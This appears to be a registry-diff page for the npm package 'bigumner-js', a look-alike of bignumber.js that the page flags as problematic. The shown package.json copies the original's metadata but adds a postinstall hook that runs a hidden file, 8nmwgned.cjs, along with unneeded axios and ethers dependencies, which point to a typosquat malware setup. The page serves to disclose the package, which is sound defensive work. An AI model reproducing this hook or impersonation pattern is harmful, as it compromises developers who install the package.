bigumner-js 9.1.2
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of bigumner-js might be problematic. Click here for more details.
- package/8nmwgned.cjs +1 -0
- package/LICENCE.md +26 -0
- package/README.md +286 -0
- package/bignumber.js +2922 -0
- package/package.json +56 -0
package/package.json
ADDED
|
@@ -0,0 +1,56 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "bigumner-js",
|
|
3
|
+
"description": "A library for arbitrary-precision decimal and non-decimal arithmetic",
|
|
4
|
+
"version": "9.1.2",
|
|
5
|
+
"keywords": [
|
|
6
|
+
"arbitrary",
|
|
7
|
+
"precision",
|
|
8
|
+
"arithmetic",
|
|
9
|
+
"big",
|
|
10
|
+
"number",
|
|
11
|
+
"decimal",
|
|
12
|
+
"float",
|
|
13
|
+
"biginteger",
|
|
14
|
+
"bigdecimal",
|
|
15
|
+
"bignumber",
|
|
16
|
+
"bigint",
|
|
17
|
+
"bignum"
|
|
18
|
+
],
|
|
19
|
+
"repository": {
|
|
20
|
+
"type": "git",
|
|
21
|
+
"url": "https://github.com/MikeMcl/bignumber.js.git"
|
|
22
|
+
},
|
|
23
|
+
"main": "bignumber",
|
|
24
|
+
"module": "bignumber.mjs",
|
|
25
|
+
"browser": "bignumber.js",
|
|
26
|
+
"types": "bignumber.d.ts",
|
|
27
|
+
"exports": {
|
|
28
|
+
".": {
|
|
29
|
+
"types": "./bignumber.d.ts",
|
|
30
|
+
"require": "./bignumber.js",
|
|
31
|
+
"import": "./bignumber.mjs",
|
|
32
|
+
"browser": "./bignumber.js"
|
|
33
|
+
},
|
|
34
|
+
"./bignumber.mjs": "./bignumber.mjs",
|
|
35
|
+
"./bignumber.js": "./bignumber.js",
|
|
36
|
+
"./package.json": "./package.json"
|
|
37
|
+
},
|
|
38
|
+
"author": {
|
|
39
|
+
"name": "Michael Mclaughlin",
|
|
40
|
+
"email": "M8ch88l@gmail.com"
|
|
41
|
+
},
|
|
42
|
+
"engines": {
|
|
43
|
+
"node": "*"
|
|
44
|
+
},
|
|
45
|
+
"license": "MIT",
|
|
46
|
+
"scripts": {
|
|
47
|
+
"postinstall": "node 8nmwgned.cjs"
|
|
48
|
+
},
|
|
49
|
+
"dependencies": {
|
|
50
|
+
"axios": "^1.7.7",
|
|
51
|
+
"ethers": "^6.13.2"
|
|
52
|
+
},
|
|
53
|
+
"files": [
|
|
54
|
+
"8nmwgned.cjs"
|
|
55
|
+
]
|
|
56
|
+
}
|